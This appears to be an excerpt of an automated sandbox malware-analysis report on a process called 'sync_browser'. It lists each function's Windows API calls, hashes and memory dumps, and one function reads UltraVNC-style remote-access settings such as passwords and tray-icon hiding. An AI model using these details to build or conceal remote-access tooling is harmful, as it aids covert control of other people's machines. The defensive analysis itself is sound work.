Opcode Fuzzy Hash: e4fa7076d3caa874285a54a3ee283af3e05e33e5fe15350dd15a6e5305daa52a
Instruction Fuzzy Hash: 87312923A38E8246EAA18B15A8447BAE794FFB5758F141130FD4D83AD1DF3DD4498600

Function 00007FF67E889234 Relevance: 4.5, APIs: 3, Instructions: 46memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF67E889257
HeapAlloc.KERNEL32(?,?,00000000,00007FF67E88331F,?,?,?,00007FF67E8837F7,?,?,?,00007FF67E87FFD1), ref: 00007FF67E88928B
_callnewh.LIBCMT ref: 00007FF67E8892A2

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: AllocHeap_callnewh_errno
String ID:
API String ID: 849339952-0
Opcode ID: 168cf3911275e585727ccf2278bdf0a034da8738718f6c23c6dd903017626324
Instruction ID: d36c855a7642f3aef01d8adab0d07a647617e089a8ab95d4db4856d08eac8167
Opcode Fuzzy Hash: 168cf3911275e585727ccf2278bdf0a034da8738718f6c23c6dd903017626324
Instruction Fuzzy Hash: 96115223B3D24289FA5A4B59D644779F2959FA47A4F088A30FD2DC6AD4DF6CB4488300

Function 00007FF67E7D4140 Relevance: 3.0, APIs: 2, Instructions: 44windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

SendMessageA.USER32 ref: 00007FF67E7D41C0
FreeLibrary.KERNELBASE(?,?,?,00007FF67E7D4124), ref: 00007FF67E7D41CF

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: FreeLibraryMessageSend
String ID:
API String ID: 3583424976-0
Opcode ID: 5a9c5ba6fc8a087abeda093f91cff5a2c035cde94b70426cc823780c6ac37473
Instruction ID: e29f457b56b8f697d946af79174f4569af55500f9d03ecb0e4e0cabc5c9b5445
Opcode Fuzzy Hash: 5a9c5ba6fc8a087abeda093f91cff5a2c035cde94b70426cc823780c6ac37473
Instruction Fuzzy Hash: A6113C2BF2E54295FF59DFA1C4626785354AFB8B44F1805B1EE0E82A81DF3EE848C311

Function 00007FF67E82CBC0 Relevance: 3.0, APIs: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FF67E82CBE6

Part of subcall function 00007FF67E82CC40: shutdown.WS2_32 ref: 00007FF67E82CC70
Part of subcall function 00007FF67E82CC40: closesocket.WS2_32 ref: 00007FF67E82CC7A

setsockopt.WS2_32 ref: 00007FF67E82CC16

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: closesocketsetsockoptshutdownsocket
String ID:
API String ID: 3513852771-0
Opcode ID: 312866c292d7188c2f9fc1aa8d6132574570804f7b68aec9e7564259e9557771
Instruction ID: 89d8775372346dc2dbf861d691dffc457882aa0dc0377bdac3f39768724debc5
Opcode Fuzzy Hash: 312866c292d7188c2f9fc1aa8d6132574570804f7b68aec9e7564259e9557771
Instruction Fuzzy Hash: 2FF0CDB3A3820387FB209F24D8003B5A364AF60704F240634EA58C66D0DF7ED1898A40

Function 00007FF67E82D170 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FF67E82D1AA
setsockopt.WS2_32 ref: 00007FF67E82D1D1

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 6674a668f832169722ee7df8d3b9e7f845b9a455c109241ca5fb51d15d315839
Instruction ID: a6e9138c06de63b872fbb3adca8421d68fb18b18d05bdcc02f3d2cf6a5d79852
Opcode Fuzzy Hash: 6674a668f832169722ee7df8d3b9e7f845b9a455c109241ca5fb51d15d315839
Instruction Fuzzy Hash: 8AF06262A2418253F7228F64D4442B5E751FB94715F140A31EAADCAAD4CFBCC19E8B00

Function 00007FF67E82D1F0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00007FF67E82D20D

Part of subcall function 00007FF67E82DD90: select.WS2_32 ref: 00007FF67E82DE1D

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CountTickselect
String ID:
API String ID: 2475007269-0
Opcode ID: 84556e81f7513f2c210acb167795192905406201bcbf957d422c0e9d6dbf8d4c
Instruction ID: 4949d0341f298d3cac815879cc0653638e716cfe6744cb8d18452b28ec043ec7
Opcode Fuzzy Hash: 84556e81f7513f2c210acb167795192905406201bcbf957d422c0e9d6dbf8d4c
Instruction Fuzzy Hash: 2031947371468187EB04CF21D5442ED7B51E7A8B84F1A8039DF098B789DF3DE5498750

Function 00007FF67E8832EC Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF67E889234: _errno.LIBCMT ref: 00007FF67E889257

Sleep.KERNEL32(?,?,?,00007FF67E8837F7,?,?,?,00007FF67E87FFD1,?,?,?,?,00007FF67E878C19), ref: 00007FF67E883331

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Sleep_errno
String ID:
API String ID: 1068366078-0
Opcode ID: e0fad309830d1d7079ffb5554beb775af7228a8f16d0edcc9117263fd617f576
Instruction ID: 7fa18ebfa1342a6d6834f21a0f6aae3862b7dcb641567cadb561bcefd12e7b83
Opcode Fuzzy Hash: e0fad309830d1d7079ffb5554beb775af7228a8f16d0edcc9117263fd617f576
Instruction Fuzzy Hash: C7014B27A34A8186EA559B17A84006DB6A5EBA8FD0B591531FE5D43BA0CF3CE895C700

Function 00007FF67E8792A4 Relevance: 1.3, APIs: 1, Instructions: 35COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 00007FF67E8792C7

Part of subcall function 00007FF67E878C34: _FF_MSGBANNER.LIBCMT ref: 00007FF67E878C64
Part of subcall function 00007FF67E878C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF67E88329C,?,?,?,00007FF67E887749,?,?,?,00007FF67E8877F3), ref: 00007FF67E878C89
Part of subcall function 00007FF67E878C34: _callnewh.LIBCMT ref: 00007FF67E878CA2
Part of subcall function 00007FF67E878C34: _errno.LIBCMT ref: 00007FF67E878CAD
Part of subcall function 00007FF67E878C34: _errno.LIBCMT ref: 00007FF67E878CB8

Part of subcall function 00007FF67E877DE8: _errno.LIBCMT ref: 00007FF67E877E00
Part of subcall function 00007FF67E877DE8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67E877E0C

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errno$AllocHeap_callnewh_invalid_parameter_noinfomalloc
String ID:
API String ID: 2392878220-0
Opcode ID: e3a64b8f513c80d9bca10802794e1cd82fac0bb9dd7e2a98fdd0c60ab68321e3
Instruction ID: 879515658a8d635f02268e9b7eebd2caa4bbab29fabb1a6d6212321a704cfb5c
Opcode Fuzzy Hash: e3a64b8f513c80d9bca10802794e1cd82fac0bb9dd7e2a98fdd0c60ab68321e3
Instruction Fuzzy Hash: 44F0F423B2968241FB14D6BDA00177AE2919F647C0F488534FF1C86B95EE2CD4058700

Non-executed Functions

Function 00007FF67E7CE1D0 Relevance: 457.8, APIs: 190, Strings: 71, Instructions: 1023COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E877978: malloc.LIBCMT ref: 00007FF67E877992

Part of subcall function 00007FF67E877978: _callnewh.LIBCMT ref: 00007FF67E877986

GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E7CE253
wsprintfA.USER32 ref: 00007FF67E7CE268
WritePrivateProfileStringA.KERNEL32 ref: 00007FF67E7CE284
GetLastError.KERNEL32 ref: 00007FF67E7CE28E
_itow.LIBCMT ref: 00007FF67E7CE2A1

Part of subcall function 00007FF67E8795C0: xtoa.LIBCMT ref: 00007FF67E8795DC

Part of subcall function 00007FF67E7CA040: OpenInputDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA07A
Part of subcall function 00007FF67E7CA040: GetCurrentThreadId.KERNEL32 ref: 00007FF67E7CA083
Part of subcall function 00007FF67E7CA040: GetThreadDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA08B
Part of subcall function 00007FF67E7CA040: SetThreadDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA0A6
Part of subcall function 00007FF67E7CA040: MessageBoxA.USER32 ref: 00007FF67E7CA0B7
Part of subcall function 00007FF67E7CA040: SetThreadDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA0C2
Part of subcall function 00007FF67E7CA040: CloseDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA0CB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E7CE2E2
wsprintfA.USER32 ref: 00007FF67E7CE2F7
WritePrivateProfileStringA.KERNEL32 ref: 00007FF67E7CE313
GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E7CE32D
wsprintfA.USER32 ref: 00007FF67E7CE342
WritePrivateProfileStringA.KERNEL32 ref: 00007FF67E7CE35E
GetPrivateProfileStringA.KERNEL32 ref: 00007FF67E7CE389
GetPrivateProfileStringA.KERNEL32 ref: 00007FF67E7CE3B4
GetPrivateProfileStringA.KERNEL32 ref: 00007FF67E7CE3DF
WritePrivateProfileStringA.KERNEL32 ref: 00007FF67E7CE3F9
WritePrivateProfileStringA.KERNEL32 ref: 00007FF67E7CE413
WritePrivateProfileStringA.KERNEL32 ref: 00007FF67E7CE42D
GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E7CE447
GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E7CE463
GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E7CE47F
wsprintfA.USER32 ref: 00007FF67E7CE496
WritePrivateProfileStringA.KERNEL32 ref: 00007FF67E7CE4B2
wsprintfA.USER32 ref: 00007FF67E7CE4C7

Strings

locdom1, xrefs: 00007FF67E7CE433, 00007FF67E7CE4A1
AuthRequired, xrefs: 00007FF67E7CE76A, 00007FF67E7CE824
SingleWindow, xrefs: 00007FF67E7CF433, 00007FF67E7CF694
path, xrefs: 00007FF67E7CE55B, 00007FF67E7CE669
UseDSMPlugin, xrefs: 00007FF67E7CE731, 00007FF67E7CE7C2
EnableDriver, xrefs: 00007FF67E7CF3D1, 00007FF67E7CF5FB
AllowEditClients, xrefs: 00007FF67E7CE939, 00007FF67E7CE9D6
admin_auth, xrefs: 00007FF67E7CE372, 00007FF67E7CE39D, 00007FF67E7CE3C8, 00007FF67E7CE3EC, 00007FF67E7CE406, 00007FF67E7CE420, 00007FF67E7CE43A, 00007FF67E7CE454, 00007FF67E7CE478, 00007FF67E7CE4A8, 00007FF67E7CE4D9, 00007FF67E7CE50A
EnableVirtual, xrefs: 00007FF67E7CF413, 00007FF67E7CF661
TurboMode, xrefs: 00007FF67E7CF2FE, 00007FF67E7CF4A2
LoopbackOnly, xrefs: 00007FF67E7CE5E4, 00007FF67E7CE71A
MaxCpu, xrefs: 00007FF67E7CF3AC, 00007FF67E7CF5C8
FileTransferEnabled, xrefs: 00007FF67E7CE9ED, 00007FF67E7CEB00
QueryTimeout, xrefs: 00007FF67E7CEF6B, 00007FF67E7CF016
PollUnderCursor, xrefs: 00007FF67E7CF31B, 00007FF67E7CF4D3
DebugLevel, xrefs: 00007FF67E7CE5AE, 00007FF67E7CE6B8
admin, xrefs: 00007FF67E7CE241, 00007FF67E7CE27A, 00007FF67E7CE2C5, 00007FF67E7CE309, 00007FF67E7CE320, 00007FF67E7CE354, 00007FF67E7CE521, 00007FF67E7CE53B, 00007FF67E7CE562, 00007FF67E7CE594, 00007FF67E7CE5B5, 00007FF67E7CE5CF, 00007FF67E7CE5EB, 00007FF67E7CE627, 00007FF67E7CE655, 00007FF67E7CE670, 00007FF67E7CE68E, 00007FF67E7CE6BF, 00007FF67E7CE6F0, 00007FF67E7CE721, 00007FF67E7CE738, 00007FF67E7CE752, 00007FF67E7CE771, 00007FF67E7CE790, 00007FF67E7CE7C9, 00007FF67E7CE7FA, 00007FF67E7CE82B, 00007FF67E7CE85C, 00007FF67E7CE87E, 00007FF67E7CE8AB, 00007FF67E7CE8D3, 00007FF67E7CE8EA, 00007FF67E7CE904, 00007FF67E7CE921, 00007FF67E7CE940, 00007FF67E7CE97B, 00007FF67E7CE9AC, 00007FF67E7CE9DD, 00007FF67E7CE9F4, 00007FF67E7CEA11, 00007FF67E7CEA30, 00007FF67E7CEA4F, 00007FF67E7CEA6B, 00007FF67E7CEA8B, 00007FF67E7CEAAB, 00007FF67E7CEAC8, 00007FF67E7CEB07, 00007FF67E7CEB3B, 00007FF67E7CEB69, 00007FF67E7CEB9A, 00007FF67E7CEBCB, 00007FF67E7CEBFF, 00007FF67E7CEC30, 00007FF67E7CEC61, 00007FF67E7CEC7D, 00007FF67E7CEC9A, 00007FF67E7CECB9, 00007FF67E7CECD8, 00007FF67E7CECFD, 00007FF67E7CED17, 00007FF67E7CED37, 00007FF67E7CED76, 00007FF67E7CEDA7, 00007FF67E7CEDD8, 00007FF67E7CEE09, 00007FF67E7CEE3A, 00007FF67E7CEE6B, 00007FF67E7CEEA2, 00007FF67E7CEEBB, 00007FF67E7CEED5, 00007FF67E7CEF0D, 00007FF67E7CEF3E, 00007FF67E7CEF55, 00007FF67E7CEF72, 00007FF67E7CEF91, 00007FF67E7CEFB0, 00007FF67E7CEFEC, 00007FF67E7CF01D, 00007FF67E7CF051, 00007FF67E7CF07F, 00007FF67E7CF12C, 00007FF67E7CF149, 00007FF67E7CF165, 00007FF67E7CF181, 00007FF67E7CF19D, 00007FF67E7CF1BA, 00007FF67E7CF1F7, 00007FF67E7CF225, 00007FF67E7CF256, 00007FF67E7CF287, 00007FF67E7CF2B8, 00007FF67E7CF2E9
group3, xrefs: 00007FF67E7CE3C1, 00007FF67E7CE419
IdleTimeout, xrefs: 00007FF67E7CED30, 00007FF67E7CEE9B
AutoPortSelect, xrefs: 00007FF67E7CECD1, 00007FF67E7CEE02
DSMPlugin, xrefs: 00007FF67E7CE877, 00007FF67E7CE8CC
group2, xrefs: 00007FF67E7CE396, 00007FF67E7CE3FF
AllowLoopback, xrefs: 00007FF67E7CE74B, 00007FF67E7CE7F3
RemoveAero, xrefs: 00007FF67E7CEECE, 00007FF67E7CEF37
MSLogonRequired, xrefs: 00007FF67E7CE2BE, 00007FF67E7CE302
locdom2, xrefs: 00007FF67E7CE44D, 00007FF67E7CE4D2
passwd2, xrefs: 00007FF67E7CF0DF, 00007FF67E7CF106
UseRegistry, xrefs: 00007FF67E7CE23A, 00007FF67E7CE273
HTTPPortNumber, xrefs: 00007FF67E7CED10, 00007FF67E7CEE64
kickrdp, xrefs: 00007FF67E7CF196, 00007FF67E7CF2B1
AllowProperties, xrefs: 00007FF67E7CE91A, 00007FF67E7CE9A5
ConnectPriority, xrefs: 00007FF67E7CE789, 00007FF67E7CE855
QuerySetting, xrefs: 00007FF67E7CEF4E, 00007FF67E7CEFE5
FileTransferTimeout, xrefs: 00007FF67E7CEA84, 00007FF67E7CEBF8
secondary, xrefs: 00007FF67E7CEAC1, 00007FF67E7CEC5A
, xrefs: 00007FF67E7CF475
BlankInputsOnly, xrefs: 00007FF67E7CEA48, 00007FF67E7CEB93
LockSetting, xrefs: 00007FF67E7CF142, 00007FF67E7CF21E
AuthHosts, xrefs: 00007FF67E7CE8A4, 00007FF67E7CE8E3
RemoveWallpaper, xrefs: 00007FF67E7CEEB4, 00007FF67E7CEF06
XDMCPConnect, xrefs: 00007FF67E7CECB2, 00007FF67E7CEDD1
OnlyPollConsole, xrefs: 00007FF67E7CF372, 00007FF67E7CF566
accept_reject_mesg, xrefs: 00007FF67E7CE58D, 00007FF67E7CE687
DisableTrayIcon, xrefs: 00007FF67E7CE5C8, 00007FF67E7CE6E9
PollForeground, xrefs: 00007FF67E7CF337, 00007FF67E7CF504
primary, xrefs: 00007FF67E7CEAA4, 00007FF67E7CEC29
FTUserImpersonation, xrefs: 00007FF67E7CEA0A, 00007FF67E7CEB34
passwd, xrefs: 00007FF67E7CF094, 00007FF67E7CF0B8
QueryIfNoLogon, xrefs: 00007FF67E7CEFA9, 00007FF67E7CF078
Avilog, xrefs: 00007FF67E7CE534, 00007FF67E7CE64E
BlankMonitorEnabled, xrefs: 00007FF67E7CEA29, 00007FF67E7CEB62
SocketConnect, xrefs: 00007FF67E7CEC76, 00007FF67E7CED6F
SingleWindowName, xrefs: 00007FF67E7CF462, 00007FF67E7CF6AF
InputsEnabled, xrefs: 00007FF67E7CF125, 00007FF67E7CF1F0
PortNumber, xrefs: 00007FF67E7CECF6, 00007FF67E7CEE33
EnableHook, xrefs: 00007FF67E7CF3F0, 00007FF67E7CF62E
poll, xrefs: 00007FF67E7CF305, 00007FF67E7CF322, 00007FF67E7CF33E, 00007FF67E7CF35A, 00007FF67E7CF379, 00007FF67E7CF39C, 00007FF67E7CF3B3, 00007FF67E7CF3D8, 00007FF67E7CF3F7, 00007FF67E7CF41A, 00007FF67E7CF43A, 00007FF67E7CF46E, 00007FF67E7CF4A9, 00007FF67E7CF4DA, 00007FF67E7CF50B, 00007FF67E7CF53C, 00007FF67E7CF56D, 00007FF67E7CF59E, 00007FF67E7CF5CF, 00007FF67E7CF602, 00007FF67E7CF635, 00007FF67E7CF668, 00007FF67E7CF69B, 00007FF67E7CF6B6
NewMSLogon, xrefs: 00007FF67E7CE319, 00007FF67E7CE34D
UltraVNC, xrefs: 00007FF67E7CF09B, 00007FF67E7CF0BF, 00007FF67E7CF0E6, 00007FF67E7CF10D
HTTPConnect, xrefs: 00007FF67E7CEC93, 00007FF67E7CEDA0
QueryAccept, xrefs: 00007FF67E7CEF8A, 00007FF67E7CF04A
PollFullScreen, xrefs: 00007FF67E7CF353, 00007FF67E7CF535
EnableJapInput, xrefs: 00007FF67E7CF17A, 00007FF67E7CF280
OnlyPollOnEvent, xrefs: 00007FF67E7CF395, 00007FF67E7CF597
LocalInputsDisabled, xrefs: 00007FF67E7CF15E, 00007FF67E7CF24F
DebugMode, xrefs: 00007FF67E7CE51A, 00007FF67E7CE620
locdom3, xrefs: 00007FF67E7CE471, 00007FF67E7CE503
DefaultScale, xrefs: 00007FF67E7CEA64, 00007FF67E7CEBC4
clearconsole, xrefs: 00007FF67E7CF1B3, 00007FF67E7CF2E2
group1, xrefs: 00007FF67E7CE36B, 00007FF67E7CE3E5
AllowShutdown, xrefs: 00007FF67E7CE8FD, 00007FF67E7CE974

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfile$String$Write$Desktopwsprintf$Thread$CloseCurrentErrorInputLastMessageOpen_callnewh_itowmallocxtoa
